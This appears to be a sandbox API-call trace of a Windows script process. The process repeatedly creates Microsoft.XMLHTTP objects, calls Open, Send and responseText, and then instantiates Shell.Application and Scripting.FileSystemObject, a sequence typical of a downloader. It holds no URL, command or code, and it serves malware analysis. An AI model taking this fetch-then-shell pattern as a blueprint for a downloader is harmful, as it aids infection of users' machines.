	[0851.237] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0851.237] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0851.237] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0851.237] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74f8) returned 0x0
	[0851.237] ??2@YAPEAX_K@Z () returned 0x62f330
	[0851.237] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74f8, pUnkSite=0x62f330) 
	[0851.237] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0851.237] XMLHTTPRequest:IUnknown:Release (This=0x49c74f8) returned 0x0
	[0851.237] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0851.237] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0851.238] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0851.238] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0851.238] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0851.238] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0851.238] SysStringLen (param_1=0x0) returned 0x0
	[0851.238] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0851.238] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0851.238] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7540) returned 0x0
	[0851.238] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0851.238] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0851.238] ??2@YAPEAX_K@Z () returned 0x62f310
	[0851.238] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0851.238] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0851.238] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0851.238] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7540) returned 0x0
	[0851.239] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7540) returned 0x3
	[0851.239] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0851.239] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7540, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0851.239] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0851.239] longjmp () 
	[0851.239] longjmp () 
	[0851.239] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0851.239] SysStringLen (param_1=0x0) returned 0x0
	[0851.239] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0851.239] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0851.239] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b90) returned 0x0
	[0851.239] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0851.239] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bf8) returned 0x0
	[0851.240] ??2@YAPEAX_K@Z () returned 0x62f330
	[0851.240] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bf8, pUnkSite=0x62f330) 
	[0851.240] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0851.240] XMLHTTPRequest:IUnknown:Release (This=0x49c5bf8) returned 0x0
	[0851.240] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b90) returned 0x0
	[0851.240] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b90) returned 0x3
	[0851.240] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0851.240] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b90, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0851.240] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0851.240] longjmp () 
	[0851.240] longjmp () 
	[0851.240] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0851.241] SysStringLen (param_1=0x0) returned 0x0
	[0851.241] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0851.241] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0851.241] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0851.241] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0851.241] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0851.241] ??2@YAPEAX_K@Z () returned 0x62f310
	[0851.241] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f310) 
	[0851.241] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0851.241] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0851.241] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0851.241] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0851.241] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0851.242] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0851.242] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0851.242] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0851.242] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0851.242] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0851.579] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0851.579] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0851.579] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0851.579] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0851.579] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0851.580] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0851.580] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0851.580] SysStringLen (param_1=0x0) returned 0x0
	[0851.580] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0851.580] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0851.580] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0851.580] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0851.580] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0851.580] ??2@YAPEAX_K@Z () returned 0x62f350
	[0851.580] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0851.580] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0851.581] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0851.581] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0851.581] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0851.581] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0851.581] SysStringLen (param_1=0x0) returned 0x0
	[0851.581] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0851.584] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0851.584] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0851.584] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0851.584] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0851.584] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0851.584] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0855.802] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0855.802] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0855.802] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0855.803] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0855.803] SysStringLen (param_1=0x0) returned 0x0
	[0855.803] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
